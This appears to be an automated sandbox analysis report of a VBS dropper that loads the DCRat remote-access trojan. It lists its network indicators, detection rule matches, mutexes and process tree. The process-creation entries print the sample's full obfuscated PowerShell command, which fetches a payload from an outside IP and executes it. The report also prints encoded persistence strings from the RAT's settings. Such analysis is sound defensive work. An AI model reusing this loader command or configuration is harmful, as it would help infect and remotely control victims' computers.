            Source: global traffic, HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3dll.txt HTTP/1.1, Host: 91.202.233.169, Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3Pe.txt HTTP/1.1, Host: 91.202.233.169
            Source: global traffic, HTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DJ1.txt HTTP/1.1, Host: 91.202.233.169
            Source: Joe Sandbox View, IP Address: 91.202.233.169
            Source: Joe Sandbox View, IP Address: 89.117.23.22
            Source: Joe Sandbox View, ASN Name: M247GB
            Source: Joe Sandbox View, ASN Name: LRTC-ASLT
            Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 91.202.233.169:80
            Source: unknown, TCP traffic detected without corresponding DNS query: 91.202.233.169 (50 occurrences)
            Source: global traffic, DNS traffic detected: DNS query: dczas.duckdns.org
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXT
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169
            Source: powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/R
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txt
            Source: powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1689935401.00000185030F0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/Ex
            Source: powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.202.H
            Source: RegSvcs.exe, 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: RegSvcs.exe, 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1721844392.000002244566F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1721844392.000002244562B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1721844392.0000022445642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR

            System Summary

            Source: dump.pcap, type: PCAP, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects known downloader agent Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects known downloader agent Author: ditekSHen
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects known downloader agent Author: ditekSHen
            Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects known downloader agent Author: ditekSHen
            Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR, Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_013E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_013E6EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_013E6288
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_013EB590
            Source: sostener.vbs, Initial sample: Strings found which are bigger than 50
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, Settings.cs | Base64 encoded string: 'm1SVmzq41bUtAgiVmChGud35fX/aUNtosr8PYStFYOAnPrN+XR+IkjYiqiUpGtB3iVUC/dwECsCyuNfy8XiQAX4f4BhMF5n5tkjlBy9/rl0=', 'iL4iV3kbq9Wc0eHBghluHFSJGvtmXcYzxD3f8ndQ9uTnqLo5XWL/Ob2NJszbQS9lzFt1jtk75UQxLxfydXIBbg==', 'NiwdLwCGJgE9T7NLnBzBzUZfLUnyV6dx/ze20L7vWNWQ5mgVR+i6SjVmK91d/XSyq8PTQbbEpEgD0Xcz2y73QaWV99k2Y1Pt+k+9qXbk4PVBd+RqCLBna/DVB9TyjaEidnq1LUCkN2zxPmQaYaEvCgmRmdNoBfuk36jL1sYox30ftHy5iwhDgfI8fL3PpwAo3sNeka/8mx1KcBGR7oR1xVUtiKEzj2D/1D0w24ko+BPZT7PtOwOk/zDAz2BhLe2bfHbQfgQPn2k2xohtMzwXk2d1LJokIAhKOsfQJ3IsiLkxzOAXHL+Zz7hFHWBUaTa74PzCj7UfJlo9t7tL31QcU0Ut5s1Z7GDAxwuCsQ+4EzdbnwOAr3L13MzLh/+6y0AmG8WY9d2v7FLTX49s6HUqXpfCJRrXXHSXolFZyNXJqU03WuCVMP3GnWK91ZRKysddcBJYYLw7JcGX0jSLUaFDCOShBrZcR1uNqWGg3y5kzcjvkNKmSLFHUt2yApjlgOV3LvWJ10fwH+T7AP8aFNYnyqz/JKxqqIJI29IaIpV1p7PytVd8DrnVQxsy2MIw4VmUjU68usaUG1/Sq003yCFYdKuWDoYb9XReUAYDxzoG4KEcVXpQiIgn3zmO+fNWbIWUMeR50jVsNO8+HO30YezLEMATPkCTImVSQAeDK4Wm6pW16ivu30DMoIRVu+JE1Oxe1HkxdJZaT1fik4dKGO58CYSSeiUTyrUbI6kBZQnDVnBzkNu2Al6SwE73fajFQLal+oSGQ2T9MhdGgEGVOYUGWoI+0y9lX9fJGbdja0QpZ8IOom55sJJp2mAYPqxtpzULHJeDbSQto9MeA7meSBtk7rEJECdJHtIqe5Dd+7fWE4v68VSq+rkJr4ZzP6YIZ+Js0KXt1TWnQ22NcCZ3aooBNp7Lm/ZW706KP6Wj1Zn74tOEq78XWGXGPsZ2JvxQoCk45CTkBqTr58qnivpoprK+t+TL4LBqtyBV+iHUkivD4I+OfR1MRJm/SSoJKHHT0YgDwv+d/r9ZqNKvRP1sv456gPAESQDOHbKMPTM9qe+3KzFdhYSV6gRZfTnAPBjEnfSl', 'UB9UzwA9tGakGgTcozLufAUFQxQCuoOi+9ktVsBWG9zFIaU239Gos24AjhaHGQraIeSRRMO3GubTGWn/PCwrNYDzeS4gR3UOWKRrfG9785AWj+/K1SLSEQEyKczGXXNvpC+Yxv5Iymd50ZYpBzwc9x1ME3yP5inYKo5PAUjVoKBlbQlnkfav1AqoOrhH7ohpYYwiXO65nsLpVF8JreGq/VlAHr1JQ9fopC032bYNkBljQf6l83C+UrfxPGpwixgV84GrrDa4efbY4mhD/tCoGnoWO4dgjbGj+FO0qjoyq3E=', 'MIlzi1B7PthTHEHMqprZFE7qh2CwotWNt1bDN2lDdtoVWtDWHS/TzpIcw4Wbme2XtTl/hfh6Cu0vUdf8k+aIhQ==', 'K37OLhwW8YSNgPJaT0/aIK6XT8xXXyJ8hP5zAzYNpppfpBxw4RuVM3WlDbJs4ti69CCz6JpT8wlSjr3femWfpw==', 'j59e0As5uh5mS607NeJD0+mZaKrTbSvccTOP1iThRoCdeFwO1hE/wQ4vuh1aDrUI68wwcvmfYRuWnrMNT8SRhg=='
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, NormalStartup.cs | Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@8/5@7/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxbjuoro.p31.ps1
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
